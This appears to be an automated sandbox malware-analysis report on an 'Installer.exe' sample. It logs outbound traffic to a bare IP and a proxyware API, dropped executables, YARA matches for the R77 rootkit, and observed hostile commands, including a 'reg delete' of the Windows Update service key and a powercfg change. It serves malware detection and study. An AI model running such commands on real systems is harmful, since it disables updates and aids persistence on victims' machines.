Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210
Source: unknown	TCP traffic detected without corresponding DNS query: 109.107.173.210

Source: unknown

HTTP traffic detected: POST /api/proxy/nodes/get HTTP/1.1Content-Type: application/jsonUser-Agent: Microsoft Internet ExplorerHost: api.peer2profit.comContent-Length: 186Cache-Control: no-cache

Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:50032 version: TLS 1.2

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe

Code function: 42_2_00F216C0 GetModuleFileNameW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,FindCloseChangeNotification,___tlregdtor,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,CreateProcessW,OpenClipboard,Sleep,

42_2_00F216C0

Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 70.2.dllhost.exe.23bed1b0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 70.2.dllhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 42.0.MfU3390p.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 69.2.audiodg.exe.1e0e69f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 38.2.NtjHIfvQ.exe.fe0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 70.2.dllhost.exe.23bed180000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 70.2.dllhost.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 52.0.MfU3390p.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 69.2.audiodg.exe.1e0e69f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 42.2.MfU3390p.exe.f20000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 70.2.dllhost.exe.14001e0b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 38.2.NtjHIfvQ.exe.1010000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 38.2.NtjHIfvQ.exe.fe0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 70.2.dllhost.exe.23bed180000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 69.2.audiodg.exe.1e0e6c60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 52.2.MfU3390p.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 70.2.dllhost.exe.14001e0b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 69.2.audiodg.exe.1e0e6c60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 70.2.dllhost.exe.23bed1b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 38.2.NtjHIfvQ.exe.1010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000026.00000002.626071532.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000046.00000002.623052699.0000000140000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000045.00000002.647679469.000001E0E6C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000045.00000002.646633753.000001E0E69F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000046.00000002.630153308.0000023BED1B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000046.00000002.628757594.0000023BED180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000026.00000002.627158411.0000000001010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe, type: DROPPED	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_00A58D20	0_2_00A58D20
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 1_2_00007FF738D93170	1_2_00007FF738D93170
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 1_2_00007FF738D91770	1_2_00007FF738D91770
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 1_2_00007FF738D929D0	1_2_00007FF738D929D0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 1_2_00007FF738DB2510	1_2_00007FF738DB2510
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 1_2_00007FF738D96EE0	1_2_00007FF738D96EE0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F216C0	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F2D5EB	42_2_00F2D5EB
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F216C0	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F2D5EB	52_2_00F2D5EB
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF7464C8	55_2_00007FF6CF7464C8
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF74C3B8	55_2_00007FF6CF74C3B8
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF74A384	55_2_00007FF6CF74A384
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF7466D4	55_2_00007FF6CF7466D4
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF7449A4	55_2_00007FF6CF7449A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 58_2_00007FF8163F1F00	58_2_00007FF8163F1F00

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

Source: 1u8JL0XE.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: updater.exe.1.dr	Static PE information: Number of sections : 11 > 10
Source: sqlite3.dll.0.dr	Static PE information: Number of sections : 18 > 10

Source: Installer.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 70.2.dllhost.exe.23bed1b0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 70.2.dllhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 42.0.MfU3390p.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 69.2.audiodg.exe.1e0e69f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 38.2.NtjHIfvQ.exe.fe0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 4.2.OBH7JYJN.exe.1d65bd0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 70.2.dllhost.exe.23bed180000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 34.0.GoogleUpdate.exe.f80000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 70.2.dllhost.exe.140000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 52.0.MfU3390p.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 69.2.audiodg.exe.1e0e69f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 42.2.MfU3390p.exe.f20000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 70.2.dllhost.exe.14001e0b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 38.2.NtjHIfvQ.exe.1010000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 38.2.NtjHIfvQ.exe.fe0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 70.2.dllhost.exe.23bed180000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 69.2.audiodg.exe.1e0e6c60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 52.2.MfU3390p.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 70.2.dllhost.exe.14001e0b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 69.2.audiodg.exe.1e0e6c60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 70.2.dllhost.exe.23bed1b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
